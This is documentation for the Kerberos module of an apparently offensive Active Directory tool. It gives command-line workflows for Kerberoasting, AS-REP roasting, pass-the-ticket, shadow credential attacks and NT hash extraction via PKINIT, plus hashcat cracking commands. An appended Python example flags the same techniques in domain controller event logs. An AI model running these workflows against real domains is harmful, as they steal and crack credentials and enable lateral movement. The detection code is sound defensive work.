Kerberos
The krb command provides Kerberos ticket operations: obtaining TGTs and TGSs, and extracting NT hashes via PKINIT + UnPAC-the-Hash.
Usage
```bash
r4t krb <subcommand> [flags]
```
Persistent Flags
| Flag | Description |
|---|---|
| --dcs | Load domain controllers from the database as targets |
Subcommands
krb tgt
Obtain a Ticket Granting Ticket (TGT) for an account.
```bash
# Using stored credential (password or hash)
r4t krb tgt
# Specific target DC
r4t krb tgt dc01.corp.example.com
# With explicit credentials
r4t krb tgt -u jsmith -p 'P@ssword1' -d corp.example.com dc01.corp.example.com
# Using AES key
r4t krb tgt --aes <aes-key> -u jsmith -d corp.example.com
# Using PFX certificate (PKINIT)
r4t krb tgt --pfx /tmp/user.pfx dc01.corp.example.com
# Using shadow credential private key (no cert, key-only PKINIT)
r4t krb tgt --key /tmp/shadow.key -u jsmith -d corp.example.com
```
Flags
| Flag | Description |
|---|---|
| --upn | User Principal Name (optional override) |
| --key | Private key file for shadow credential / key-only PKINIT |
| --pfx | PFX file for PKINIT authentication |
| --pfx-password | PFX passphrase |
| --aes | AES-128 or AES-256 key |
The resulting TGT is:
- Written to a ccache file (path printed to stdout)
- Stored in the tgts table in SQLite
- Linked to the active credential record
krb tgs
Obtain a Ticket Granting Service ticket (TGS) for a specific SPN. Used for Kerberoasting.
```bash
# Get TGS for a specific SPN
r4t krb tgs --spn "HTTP/app.corp.example.com"
# With SID targeting
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433" --sid S-1-5-21-...
```
Flags
| Flag | Description |
|---|---|
| --spn | Target Service Principal Name (required) |
| --sid | Target account SID |
The resulting TGS is:
- Written as a kirbi/ccache file
- Output in hashcat format for offline cracking ($krb5tgs$23$...)
- Stored in the tgss table, with the hash in kerberoast_hashes
krb nt
Extract the NT hash of an account using PKINIT + UnPAC-the-Hash.
This requires a valid certificate for the target account (e.g., one obtained via adcs req). The command authenticates via Kerberos PKINIT to receive a TGT, then extracts the NT hash embedded in the PAC (Privilege Attribute Certificate). This allows Pass-the-Hash even when only a certificate is available.
```bash
# Using stored PFX credential
r4t krb nt
# With explicit PFX
r4t krb nt --pfx /tmp/admin.pfx
# Override UPN (when the certificate UPN differs from the target)
r4t krb nt --upn administrator@corp.example.com
```
Flags
| Flag | Description |
|---|---|
| --upn | Override the UPN used for PKINIT |
Authentication flags (--pfx, --pfx-password, --cert, --key, --ccache) are inherited from the global flags or the stored credential.
The extracted NT hash is printed and stored in the credentials table.
This is the same operation as adcs nt: both subcommands perform PKINIT + UnPAC-the-Hash. krb nt is the Kerberos-centric entry point, adcs nt the ADCS-centric one.
Kerberos Authentication Methods
R4t supports the standard Kerberos pre-authentication methods:
| Method | Description |
|---|---|
| Password | Standard PA-ENC-TIMESTAMP |
| NT Hash | RC4-HMAC pre-auth |
| AES Key | AES-128 or AES-256 pre-auth |
| PKINIT (PFX) | Public key pre-authentication with PFX certificate |
| PKINIT (PEM) | Public key pre-authentication with PEM cert + key |
| PKINIT (Key-only) | Shadow credential attack — key without a certificate |
Ticket Storage
| Table | Contents |
|---|---|
| tgts | Kerberos TGTs (base64-encoded ticket, expiry, target DC) |
| tgss | Kerberos TGSs (ticket, SPN, encryption type) |
| kerberoast_hashes | Kerberoastable TGS hashes in hashcat format |
| asrep_hashes | AS-REP roastable hashes |
Common Kerberos Workflows
Kerberoasting
```bash
# 1. Find Kerberoastable accounts
r4t ldap get spn
# 2. Get TGS for each SPN
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433"
# 3. Crack offline
hashcat -m 13100 kerberoast.hash wordlist.txt
```
AS-REP Roasting
```bash
# Find AS-REP roastable accounts (no pre-auth required)
r4t ldap scan
# View AS-REP hashes
r4t dbquery "SELECT * FROM asrep_hashes"
# Crack offline
hashcat -m 18200 asrep.hash wordlist.txt
```
Pass-the-Ticket
```bash
# Get a TGT and save to ccache
r4t krb tgt -u jsmith --hash <hash> -d corp.example.com
# Use the ccache in subsequent commands
export KRB5CCNAME=/tmp/jsmith.ccache
r4t ldap get users --ccache /tmp/jsmith.ccache
```
Shadow Credential Attack
```bash
# 1. Inject a key credential (via ldap dacl + modify or dedicated tool)
# 2. Get TGT using the private key
r4t krb tgt --key /tmp/injected.key -u targetuser -d corp.example.com
# 3. Extract NT hash
r4t krb nt --key /tmp/injected.key -u targetuser -d corp.example.com
```
PKINIT from ADCS Certificate
```bash
# After obtaining a certificate via adcs req
r4t krb tgt --pfx /tmp/admin.pfx
# Or extract the NT hash directly
r4t krb nt --pfx /tmp/admin.pfx
```
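The defender-side counterpart of the workflows above, as an added example that is not part of the r4t project: a Python triage over constructed Windows Security event records (4768/4769 field names as in the Windows Security log) that flags the traces these workflows leave on a domain controller: RC4 TGS requests (etype 0x17, the $krb5tgs$23$ hashes), AS-REQs without pre-authentication (type 0, the AS-REP roast case), and PKINIT logons (pre-auth type 16, the PFX and shadow-credential path).

```python
# Added example: triage of Windows Security events for the Kerberos
# patterns documented above. Sample records are constructed; field names
# follow the 4768 (TGT request) / 4769 (TGS request) event schema.

RC4_HMAC = 0x17       # etype 23 -> "$krb5tgs$23$" hashes, hashcat 13100
PA_NONE = 0           # no pre-auth -> AS-REP roastable, hashcat 18200
PA_PK_AS_REQ = 16     # PKINIT pre-auth (PFX or shadow-credential key)

def classify(event):
    """Return a list of finding tags for one event dict (empty = nothing)."""
    tags = []
    eid = event["EventID"]
    if eid == 4769:
        svc = event["ServiceName"]
        # RC4 service tickets for user service accounts are the Kerberoast
        # signature; computer accounts ($) and krbtgt are excluded as noise.
        if (event["TicketEncryptionType"] == RC4_HMAC
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            tags.append("kerberoast-rc4")
    elif eid == 4768:
        # Successful TGT without pre-auth: DONT_REQ_PREAUTH is set on the account.
        if event["PreAuthType"] == PA_NONE and event["Status"] == 0:
            tags.append("asrep-roastable")
        # Certificate-based logon: legitimate for smart cards, worth baselining.
        if event["PreAuthType"] == PA_PK_AS_REQ:
            tags.append("pkinit-logon")
    return tags

def triage(events):
    """Summarise findings per account: {TargetUserName: set(tags)}."""
    out = {}
    for ev in events:
        for tag in classify(ev):
            out.setdefault(ev["TargetUserName"], set()).add(tag)
    return out

SAMPLE_EVENTS = [  # constructed records
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.EXAMPLE.COM",
     "ServiceName": "svc_sql", "TicketEncryptionType": 0x17, "Status": 0},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.EXAMPLE.COM",
     "ServiceName": "WS01$", "TicketEncryptionType": 0x17, "Status": 0},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.EXAMPLE.COM",
     "ServiceName": "svc_web", "TicketEncryptionType": 0x12, "Status": 0},
    {"EventID": 4768, "TargetUserName": "legacyuser", "ServiceName": "krbtgt",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0},
    {"EventID": 4768, "TargetUserName": "administrator", "ServiceName": "krbtgt",
     "PreAuthType": 16, "TicketEncryptionType": 0x12, "Status": 0},
]
```

Run `triage(SAMPLE_EVENTS)` to get one finding set per account; in production the same logic applies to events pulled from the DC's Security log, with a baseline of known smart-card users for the pkinit-logon tag.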